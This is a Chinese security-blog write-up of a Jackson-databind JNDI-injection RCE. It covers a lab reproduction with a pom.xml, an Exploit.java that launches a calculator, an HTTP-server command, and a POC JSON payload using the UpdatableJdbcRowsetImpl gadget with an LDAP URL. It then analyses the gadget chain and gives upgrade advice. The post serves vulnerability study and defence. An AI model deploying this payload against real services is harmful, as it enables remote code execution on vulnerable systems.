CVE-2020-xxxx:Jackson-databind RCE

admin 2022年7月15日02:07:08评论101 views字数 2687阅读8分57秒阅读模式

影响范围

  • jackson-databind before 2.9.10.4

  • jackson-databind before 2.8.11.6

  • jackson-databind before 2.7.9.7

漏洞类型

JDNI注入导致RCE

利用条件

  • 开启enableDefaultTyping()

  • 使用了org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl第三方依赖

漏洞概述

org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。

漏洞复现

环境搭建

Step 1:新建Meaven项目:

CVE-2020-xxxx:Jackson-databind RCE


CVE-2020-xxxx:Jackson-databind RCE


CVE-2020-xxxx:Jackson-databind RCE


CVE-2020-xxxx:Jackson-databind RCE


Step 2:修改pom.xml,添加以下依赖

  <dependencies>    <dependency>      <groupId>com.fasterxml.jackson.core</groupId>      <artifactId>jackson-databind</artifactId>      <version>2.9.10.4</version>    </dependency>
<!-- https://mvnrepository.com/artifact/com.pastdev.httpcomponents/configuration --> <dependency> <groupId>org.arrahtec</groupId> <artifactId>profiler-core</artifactId> <version>6.1.7</version> </dependency> <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-nop</artifactId> <version>1.7.2</version> </dependency> <!-- https://mvnrepository.com/artifact/javax.transaction/jta --> <dependency> <groupId>javax.transaction</groupId> <artifactId>jta</artifactId> <version>1.1</version> </dependency> </dependencies>
漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下:

import java.lang.Runtime;
public class Exploit { static { try { Runtime.getRuntime().exec("calc"); } catch (Exception e) { e.printStackTrace(); } }}

编译Exploit.java文件:

CVE-2020-xxxx:Jackson-databind RCE

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务:

python -m  SimpleHTTPServer 4444

CVE-2020-xxxx:Jackson-databind RCE


搭建LDAP服务

使用marshalsec来启动一个LDAP服务:

CVE-2020-xxxx:Jackson-databind RCE


执行漏洞POC

Poc.java代码如下所示:

import com.fasterxml.jackson.databind.ObjectMapper;
public class POC { public static void main(String[] args) throws Exception { String payload = "["org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl",{"dataSourceName":"ldap://127.0.0.1:1099/Exploit","autoCommit":"true"}]"; ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); mapper.readValue(payload, Object.class); }}

之后运行该程序,成功执行命令,弹出计算器:

CVE-2020-xxxx:Jackson-databind RCE


漏洞分析

首先定位到org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl类,之后根据POC全局搜索dataSourceName,发现在setDataSourceName处调用,此时我们的DataSourceName因为没有进行初始化所以当前为null,之后进入else中调用父类的setDataSourceName函数,之后继续跟进:

CVE-2020-xxxx:Jackson-databind RCE


可以看到在父类的setDataSourceName中只是对dataSource进行了赋值而已,并无其他的操作,那么如何导致的RCE呢?带着疑问我们来看payload中的第二个参数:

第二个参数提供了一个autoCommit,之后全局搜索autoCommit发现在setautoCommit处被调用,而此时的conn未被初始化所以为null,进而进入else语句中,之后会执行一次this.connect(),下面我们跟进来看看:

CVE-2020-xxxx:Jackson-databind RCE


之后在this.connect中发现一处可疑的JNDI注入,而此时的参数为"this.getDataSourceName":

CVE-2020-xxxx:Jackson-databind RCE

该参数来自我们刚刚设置的DataSourceName,进而此处的JNDI注入参数可控,可以利用实现RCE:

CVE-2020-xxxx:Jackson-databind RCE

整个利用链如下所示:

mapper.readValue    ->org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl.setDataSourceName        ->javax.sql.rowset.BaseRowSet.setDataSourceName            ->org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl.setAutoCommit                ->this.connect()                    ->(DataSource)ctx.lookup(this.getDataSourceName())

修复建议

  • 及时将jackson-databind升级到安全版本

  • 升级到较高版本的JDK

原文始发于微信公众号(七芒星实验室):CVE-2020-xxxx:Jackson-databind RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月15日02:07:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-xxxx:Jackson-databind RCEhttps://cn-sec.com/archives/1177094.html

发表评论

匿名网友 填写信息